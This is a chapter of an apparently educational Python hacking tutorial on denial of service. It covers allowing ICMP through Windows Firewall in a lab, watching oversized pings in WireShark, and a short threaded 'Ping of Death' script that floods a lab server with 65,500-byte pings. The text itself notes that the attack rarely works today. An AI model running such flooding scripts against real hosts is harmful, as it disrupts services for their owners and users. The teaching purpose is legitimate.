Wise Technology Hunter: 20. DoS

20.1. Setting Windows Firewall

In order to use the “ping” command in a Windows environment, you must first set the firewall on the server PC to allow ICMP.

• Select [Control Panel - System and Security - Windows Firewall - Advanced Settings]

Figure 20-1 Windows firewall – Advanced Settings

• Select [Inbound Rules - New Rules]

Figure 20-2 Inbound Rules - New Rules

• Select [Rule Type - Custom]

Figure 20-3 Rule Type

• Select [Program - All Programs]

Figure 20-4 Programs

• Select “ICMPv4” in [Protocol and Ports - Protocol type] and click the [Customize] button

Figure 20-5 Protocol type – ICMPv4

• Select [Specific ICMP types - Echo Request]

Figure 20-6 Select Echo Request

• Select [Scope] and confirm that the [Any IP Address] entry has been checked.

Figure 20-7 Select Scope

• Select [Action] and confirm that you checked the [Allow the connection] entry.

Figure 20-8 Select Action

• Select the [Name] and input a note for the name you want to use. Finally click on the [Finish] button.

Figure 20-9 Enter the Name

• Open the command prompt window in the hacker PC to confirm the settings as follows.

Figure 20-10 Check Setting

20.2 Installing WireShark

To determine the detailed operation of the ping command, let's first install a monitoring tool. The WireShark program supports network monitoring and packet sniffing operations. You can obtain the installer from the download web page (http://www.wireshark.org/download.html). This program can be easily installed by running the downloaded file.

Figure 20-11 Concept of the Ping of Death

Now run “ping” in command prompt on Windows to examine the operations by WireShark. Let's run WireShark to use its network monitoring features. Then, when you run “ping” in the command prompt on Windows, you can see the details of the network activity in the WireShark screen. The “ping” command can be used with a “ping IP -l transfer data size” command. This transmits 32 bytes of data by default and can transfer data up to 65,500 bytes. In order to test the “ping”, the characters “a” through to “z” are repeatedly transmitted with a predetermined length.

Figure 20-12 Run “ping” on the Command Window

The “ping” command basically sends repeated ICMP packets four times. The execution count may be controlled by changing the options, and when the command execution has been completed, the response time that is received from the server to the screen is displayed. If the response time is large, the network state between the server and the client is not stable, and the “ping” command is often used to test whether network operation is normal.

Figure 20-13 WireShark Packet Capture

The results for the “ping server -l 65500” command are the same as those screen captured from WireShark. In the upper part, you can see that the 65,500 byte packet is transmitted in 1,480 bytes units that have been broken up. In the intermediate part, you can see that a substantial amount of packet data has been divided in the transport layer. In the last part, you can see that the data has been entered into the application layer. 65,500 bytes of data can be transmitted to the server by dividing it all into 44 pieces. If you run 100 “ping” commands at a time using a thread for each, all 44,000 large packets can be seen to be sent to the server.

20.3 Ping of Death Example

Currently, to improve system performance, the size of the data that can be sent for a ping command on the network is limited to 65,500 bytes, so the Ping of Death attack failed often. However, when a DoS attack first appeared, it was considerd to be a powerful attack tool. In the following example, it is difficult to accomplish the effects of a substantial attack. However, the conditions are sufficient to understand how to implement a DoS attack by using ICMP.

import subprocess

import thread

import time

def POD(id): #(1)

ret = subprocess.call("ping server -l 65500", shell=True)

print "%d," % id

for i in range(500): #(2)

thread.start_new_thread(POD, (i,)) #(3)

time.sleep(0.8) #(4)

Example 20-1 Ping Of Death

Execute the attack using the command prompt in Windows. Multiple threads can be used to generate a large amount of traffic, by executing ping commands in parallel.

(1) Declaring Function: declare a function to execute the ping command. The thread calls this function.

(2) Iteration: Generate 500 threads.

(3) Creating Threads: While calling the POD function, pass as an argument to determine the number of the thread that has been created.

(4) Pause: Generate one thread and then wait 0.8 seconds to reduce the load of the hacker PC.

When the above example is executed, the server PC does not go down and its performance is not significantly reduced. Let's look at the impact on performance while running the ping command from the client PC. If you enter “ping server –t” in the command prompt on Windows, the ping command will repeat until it is forced to shut down. Let's compare before and after executing the Ping Of Death.

Before Execution

After Execution

Reply from 169.254.27.229: bytes=32 time<1ms TTL=128